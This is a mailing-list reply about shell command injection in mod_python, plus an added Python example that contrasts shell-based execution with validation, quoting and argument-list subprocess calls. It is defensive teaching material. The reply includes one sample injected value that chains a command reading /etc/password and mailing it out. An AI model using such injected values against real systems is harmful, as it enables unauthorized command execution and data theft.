webograph
webograph at eml.cc
Tue Jul 25 06:55:22 EDT 2006
hi richard,

if you use a static command like "cmd", the script is perfectly all right.

you can easily run into problems if you pass unfiltered user data to a command:

    i, o = os.popen2("cmd files/%s" % user_input)

will get you into Very Big Trouble -- the user could pass "foo; cat /etc/password | mail me at my.domain" to get a list of users in your system, for example -- in other words, execute arbitrary commands.

if you have to use user input to build commands:

- check if they are valid (if user_input in list_of_valid_options, for example)
- escape everything properly

or, even better, use process functions that don't call the system's command interpreter (/bin/sh) on unix. use, for example, subprocess.call (http://docs.python.org/lib/node236.html) -- no matter what the user passes to subprocess.call(["openssl", "verify", user_input]), the only process a malicious user can call is openssl.

regards
webograph

p.s. is there some configuration error in the mailing list? when i replied 15 minutes ago, the mail was sent to the original sender directly; afaik there should be some reply-to header appended by mailman

Richard Lewis wrote:

>Hi there,
>
>Just investigating some possible implementation methods.
>
>Does it pose a security risk in mod_python to do this sort of thing:
>
>def handler(req):
>    # code is from memory so may not be correct
>    # but it's the idea that's important ;-)
>    i, o = os.popen2("cmd")
>    i.write("some data")
>    i.close()
>
>    req.write(o.read())
>    o.close()
>
>I don't really understand it properly, but I've read before now that using
>pipes to execute shell commands from CGI scripts can be insecure. Does the
>same apply with Apache modules like mod_python?
>
>Cheers,
>Richard
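
The three options named in the message above (validate, escape, or avoid the shell), as an added Python 3 example that is not part of the original post. `CHILD` is a stand-in for "cmd" that just reports the arguments it received; the function names, `VALID_OPTIONS` and `HOSTILE` are hypothetical and constructed for this illustration.

```python
import json
import shlex
import subprocess
import sys

# Stand-in for "cmd": a child process that reports the arguments it received.
CHILD = [sys.executable, "-c", "import sys, json; print(json.dumps(sys.argv[1:]))"]
CHILD_SHELL = " ".join(shlex.quote(part) for part in CHILD)

VALID_OPTIONS = {"report.txt", "notes.txt"}  # constructed allow-list
HOSTILE = "foo; echo INJECTED"  # constructed input carrying a harmless second command


def run_via_shell(user_input):
    """The pattern warned about: the whole string is parsed by /bin/sh."""
    command = "%s files/%s" % (CHILD_SHELL, user_input)
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def run_escaped(user_input):
    """Shell still involved, but the user-controlled argument is quoted."""
    command = "%s %s" % (CHILD_SHELL, shlex.quote("files/" + user_input))
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return json.loads(result.stdout)


def run_via_argv(user_input):
    """No shell at all: user_input reaches the child as exactly one argument."""
    result = subprocess.run(CHILD + ["files/" + user_input],
                            capture_output=True, text=True)
    return json.loads(result.stdout)


def run_validated(user_input):
    """Allow-list check first, then the shell-free call."""
    if user_input not in VALID_OPTIONS:
        raise ValueError("rejected input: %r" % user_input)
    return run_via_argv(user_input)


if __name__ == "__main__":
    print("shell  :", run_via_shell(HOSTILE))   # second line comes from the injected echo
    print("quoted :", run_escaped(HOSTILE))
    print("argv   :", run_via_argv(HOSTILE))
    print("valid  :", run_validated("report.txt"))
```
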